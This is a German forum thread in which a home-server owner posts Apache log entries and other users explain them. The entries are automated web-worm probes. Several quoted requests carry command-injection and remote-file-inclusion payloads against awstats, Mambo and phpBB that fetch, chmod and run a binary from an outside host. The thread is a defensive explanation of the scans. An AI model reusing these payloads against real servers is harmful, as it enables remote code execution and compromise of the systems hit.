seltsame Log-Einträge in Apachelog

[Snite]

Hallo erstmal, ich hab hier in dieses Forum reingepostet weil laut der Suche schon mehrere Threads über Apache hier drin sind. Ich hoffe das Forum ist nicht flasch gewählt. Also ich hab heute früh seltsame Logeinträge in meinen Apache "access.log" gehabt. Ich habe Apache mit XAMPP (basic package) version 1.5.1 für Windows XP/2000 installiert. Meine Apache Version ist Apache 2.2.0 und MySQL 5.0.18. Die XAMMP Control Panel Version ist 2.1 und ich benutze PHP 5.1.1. Ich denke das müsste erstmal reichen an Informationen. So und nun die Logeinträge die mir Sorgen machen.

84.162.0.86 - - [17/Mar/2006:00:59:32 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.162.0.86 - - [17/Mar/2006:00:59:33 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.162.0.86 - - [17/Mar/2006:00:59:34 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.162.0.86 - - [17/Mar/2006:00:59:35 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.162.0.86 - - [17/Mar/2006:00:59:36 +0100] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.162.0.86 - - [17/Mar/2006:00:59:37 +0100] "GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.162.0.86 - - [17/Mar/2006:00:59:38 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.162.0.86 - - [17/Mar/2006:00:59:40 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.162.0.86 - - [17/Mar/2006:00:59:41 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.162.0.86 - - [17/Mar/2006:00:59:42 +0100] "GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122

84.163.197.52 - - [17/Mar/2006:01:45:27 +0100] "GET / HTTP/1.0" 200 1023


Ich muss dazu sagen ich habe auf dem Server kein phpBB2 oder ähnliches laufen. Der Angreifer (falls es einer ist) hätte meine IP-Adresse über IRC herausfinden können da ich zu der Zeit im IRC war. Ich war aber jedoch während der Zeit nicht wach also ist mir auch nichts aufgefallen. (jaja ich weis ich bin ein idler )

Nun meine Frage was bedeuten die Zeilen nun ?

Vielen Dank schoneinmal im Vorraus.

 

[Gulliver]

Dort versucht jemand in Systeme einzubrechen die bei dir nicht vorhanden sind.
Dein Apache quittiert alles mit einem 404.

Solltest du jedoch eines dieser Dinger dort laufen haben- check die Updates und immer mal ins /tmp schauen ob man da nicht doch mal was findet

Ansonsten ist das relativ normal und bei gut gepflegten Maschinen auch nichts was dir Sorgen bereiten sollte.

mfg

 

[Snite]

Danke Sehr @ Gulliver !

Weisst du auch in welche Systeme ? Also das mit den Forum und den den phpBB2 da denk ich mir mal das er denkt das ich ein phpBB laufen habe. Aber wie kommt er auf diese Idee ? Oder ist das einfach nur irgend so ein Rootkit (oder wie das heißt) was automatisch versucht Sicherheitslücken zu entdecken/auszuprobieren ? Aber was mir jetzt echt Sorgen macht ist das hier:

84.162.0.86 - - [17/Mar/2006:00:59:35 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122

Kann mir einer sagen was für eine Sicherheitslücke er da versucht auszunutzen ? Und auf was basiere diese Sicherheitslücken im allgemeinen. Unsichere Datein von irgrendwelchen Sachen wie Foren u.ä. oder auf unsichere Einstellungen des Servers im allgemeinen ?

Das tmp-Verzeichniss ist ja für die Sessionverwaltung von PHP notwendig (so stand es zumindest im manual). Nach was muss ich da ausschau halten ?

Ich glaube es ist vieleicht doch besser vorerst den Apache auszulassen bis ich mir sicher bin das er sicher ist.

P.S.: Was mir noch aufgefallen ist er hat sich meine Seite ansonsten garnicht angeschaut also die index.html oder so etwas von daher kann man ja davon ausgehen das es irgendein Programm war. Ein Angreifer hätte sich doch vorher die Seite wenigstens angeschaut.

Danke vielmals nochmal für deine Hilfe !

 

[Zero_X]

Die Sicherheitslücken die der Angreifer ausnutzen will, sind bekannte Bugs in PHP-Skripten. In diesem Fall versucht der Angreifer fremden Code auf deinem System auszuführen.

http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./ca
cti;echo%20YYY;echo

Könnte sein, daß es wieder einen neuen Scanner für Kiddies gibt, der nach diesen Sachen automatisch scannt oder es kann ein PHP-Virus sein (z.B. Santy) der automatisch über Suchmaschinen nach anfälligen Seiten sucht. Um deinen Apache brauchst du dir keine Sorgen machen. Wenn du kein anfälliges Forum oder sonst irgendein anfälliges PHP-Skript hast, passiert nichts.

 

[Gulliver]

Welche Services das sind, kannst du am GET request sehen

"GET /mambo/index.php?..." zb das Mambo CMS System.

Sowie ein CVS (GNU cvs?) und ein verbuggtest awstats.pl script.

Das tmp-Verzeichniss ist ja für die Sessionverwaltung von PHP notwendig (so stand es zumindest im manual). Nach was muss ich da ausschau halten ?

Du kannst ueber flags in der php.ini bzw auch in den VirtualHost Eintraegen ein seperates
tmp-dir fuer die PHP Session einer jedern Site angeben.
Solltest du mehrere Sites betreiben ist das zu empfehlen.

Fuer die genauen bugs melde dich am besten beim bugtraq an. Dort erhaeltst du ne ganze reihe an Meldungen von Bugs die public werden.

Ich glaube es ist vieleicht doch besser vorerst den Apache auszulassen bis ich mir sicher bin das er sicher ist.

Mehr als anstaendig konfigurieren und patches einspielen kannste eh nicht machen.
Ggf. noch chrooten.

Du musst dich so oder so damit naeher befassen- wenn nicht wirst du frueher oder spaeter ge0wned

mfg

 

[Oi!Alex]

interessant ist wo die ip hin gehört...

http://83.16.187.6/index.php?option=com_contact&task=view&contact_id=1&Itemid=5

 

[The Dude]

solche angriffe sind voellig automatisiert, niemand muss deine ip adresse herausfinden oder welche software auf deinem webserver laeuft. die ip adresse wird entweder einfach zufaellig gewaehlt, oder es wird mittels suchmaschine nach bekannten mustern in der url gesucht. in letzterem fall ist es allerdings unwahrscheinlicher, dass angriffe auf software gefahren werden die auf deinem webserver nicht laeuft. wenn ich bei google zum beispiel nach inurl:awstats.pl suche, dann finde ich mit ziemlicher sicherheit auch nur webserver auf denen awstats vorhanden ist. ob diese version auch das entsprechende sicherheitsloch hat ist dann natuerlich noch nicht bekannt, aber da probieren diese automatischen "web-wuermer" einfach aus.
man sieht auch oft angriffe auf iis (windows nt) webserver auf einem linux/apache system, da wird dann eben einfach brute-force maessig durchprobiert.
da du ein xampp auf einem windows (an einer dsl leitung?) betreibst frag ich mich, ob du das nur zum bauen von webseiten brauchst. in dem fall waere es wahrscheinlich sinnvoll, wenn der webserver nicht aus dem internet erreichbar waere. das laesst sich leicht einstellen in der apache config datei httpd.conf. da sollte es irgendwo eine zeile geben die mit Listen anfaengt. wenn du da Listen 127.0.0.1:80 eintraegst, lauscht der webserver nur noch am loopback interface, d.h. ist nur noch von deinem recher aus zu erreichen.

 

[Snite]

Erstmal vielen Dank euch allen ihr habt mir echt geholfen !

Ich verstehe jetzt wie das mit diesen Bugs funktioniert das hilft mir schon einmal sehr weiter zu begreifen wie ernst oder weniger ernst Angriffe dieser Art sind. Ich habe mich gleich mal bei securityfocus für den bugtraq und MS Security-newsletter angemeldet. Ich werde nun einfach immer patchen wenn möglich, mir regelmäßig die Log-Dateien anschauen und schauen was ich noch an der konfiguration verbessern kann dann sollte ich ja das möglichste getan haben. Zur Sicherheit werd ich mal noch ein aktuelles BackUp von meinen System machen.

Den Server(an DSL-Leitung) hab ich zum größten daswegen laufen weil es mich einfach interessiert was man so alles damit machen kann und wie man es so konfiguriert. Das könnte ich natürlich auf offline machen aber irgendwie macht es mir so mehr Spaß. =)


Ihr habt mir echt spitze geholfen. Danke !